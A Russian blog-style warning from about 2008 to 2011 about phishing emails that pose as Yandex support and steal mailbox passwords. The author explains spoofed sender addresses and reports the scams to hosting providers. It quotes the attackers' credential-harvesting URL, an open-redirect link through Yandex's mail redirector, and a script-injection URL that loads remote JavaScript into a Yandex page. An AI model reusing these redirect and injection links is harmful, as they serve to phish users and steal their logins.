Не первый раз я получаю на адрес pers@yandex.ru письма с темой "Вам поступило 21 скрытое письмо" (или что-то подобное).

Письмо приходит с адреса "Администpaция Yаndех.ru <suupport@yandex.ru>" - обратите внимание на двойное "u" в адресе.

В коде формы предлагается ввести логин и пароль доступа к Яндексу, при этом action формы - URL-адрес http://kartunku.qkr.in/ya.php

По моим сведениям, мошенники собрали уже немало паролей. Однако, никаких окошечек с сообщением о мошенническом письме от Яндекса, не видно. В саппорт Яндекса написал, ждем ответа... технически несложно распознавать вообще любые формы, ведущие на сторонние адреса и блокировать их. Однако, Яндекс, похоже, делать этого не собирается. Так что будьте внимательны и не вводите вообще ничего в формы, расположенные в теле письма, особенно не вводите никаких паролей.

Никаких "скрытых писем" не существует ни на Яндексе, ни на одном другом почтовом сервере в мире. Существуют только "скрытые копии", но при отправке, а не при получении писем. Отличие скрытой копии от обычной лишь в том, что получатели из полей "Кому" и "Копия" (теоретически) не узнают, что это письмо еще получат и адресаты из поля "Скрытая копия". А настоящий адрес службы поддержки "Yandex.Mail" - support@mail.yandex.ru, не забудьте пересылать туда все подобные письма. У компании Mail.Ru для жалоб на недобросовестных пользователей есть адрес abuse@corp.mail.ru, а для технической поддержки пользователей - адрес support@corp.mail.ru, если письмо прислано с этой бесплатной службы, можно продублировать пересылку и туда.

Учтите только, что адрес, который Вы видите на экране в поле "From" ("От кого") - вовсе не обязательно настоящий E-mail отправителя, так что не спешите отвечать грозными письмами. К сожалению, TCP/IP создавался как открытый протокол обмена данными и подделать можно все поля заголовка почтового сообщения. Этот факт не зависит ни от Вашего провайдера, ни от почтовой программы-клиента. Мне случалось получать письма с обвинениями в спаме и на свой pers@mail.ru, хотя спамеров и недоделанных "хакеров", "ломающих" ящики простаков, я ненавижу и ни разу в жизни этим не занимался.

Однако, не все так плохо и специалисты обычно могут установить настоящее происхождение письма, пишите в техподдержку.

Все, сказанное выше, относится и ко всякого рода предложениям "ввести код, чтобы прочитать письмо", "сообщениям о блокировании ящика" и т.п. Вот еще типичные примеры такого "творчества" сетевой нечисти, полученные только за один день:

Пользуется погань и несколько более изощренными способами. Вот письмо якобы от некой девушки:

Весь фокус - в ссылке, которая, разумеется, не имеет отношения ни к какой фотке, а представляет собой редирект на скрипт жуликов, вот начало кода этой ссылки:

http://mail.yandex.ru/r?url=http%3A%2F%2Fkartunku.qkr.in%2Fya.php ...

Как видите, Яндекс разрешает с почтового сервера переадресации вида http://mail.yandex.ru/r?url=нужный_URL, чем и пользуются воры, адресующие наивного любителя фоток прямиком на свой скрипт.

Наконец, видимо от отчаяния, недоноски занялись в последнее время рассылкой просто больших картинок, имитирующих вход на какой-либо популярный сервис, а вдруг да щелкнет кто? Естественно, в результате щелчка произойдет переход все на тот же хакерский скрипт с последующей кражей пароля или заражением компьютера, если антивирус Касперского не на страже.

10.12.08. После того, как я не поленился переслать все показанные выше письма в саппорт Яндекса и провайдеру Hostland, на бесплатном сервере которого базировались воры, их сайт был в тот же день закрыт. Сегодня не угомонившиеся товарищи, которым я уже предлагал исключить мой адрес из базы, переехали на хостинг jino-net и прислали новый образец.

03.05.09. За прошедшее после написания статьи время особенно популярны у мошенников стали "пугалки" о закрытии сайта, прекращении его индексирования и т.п. Вот только сегодняшнее:

Как видите, у них даже кто-то научился писать по-русски почти без ошибок (правда, запятые всё равно не на местах).

А здесь ребята и Платона Щукина выучили (вымышленный персонаж, часто подписывающий ответы от техподдержки Яндекса). Правда, с адресом "моего" сайта mathelp.spb.ru у них прокол вышел... или наоборот ещё за рекламу от этого загадочного "матхелпа" получили? Ну а предположение, что нехороший "матхелп" указал мой адрес и теперь сообщение о закрытии его сайта идёт мне, никуда не годится - достаточно подвести курсор к ссылке на словах "специальной формы" и посмотреть в строке состояния браузера куда он ведет - на скрипт, хитрым образом перебрасывающий на форму ввода пароля и логина, почти такую же как на passport.yandex.ru, только вот год в строке копирайта забыли сменить на 2009-й :) URL у скрипта аж вот такой: http://auto.yandex.ru/search.xml?text=%29%29%3B%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fdpr.papua.go.id%2F333.js%3E%3C%2Fscript%3E; что тут главное? правильно, наличие чужого URL dpr.papua.go.id, достаточно его открыть, чтоб увидеть папку с двумя яваскриптами - закрыть просмотр папок у вора ума не хватило... похоже это на Яндекс? :-)

Ссылки по теме:
Статья о фишинге от Яндекса

2011 год. Яндекс.Почта постепенно совершенствуется, и, несмотря на усилия жуликов, шансов попасть впросак всё меньше. Не исключено, что теперь отсев мошеннического письма сумеет произвести уже сам Яндекс:

гостевая; E-mail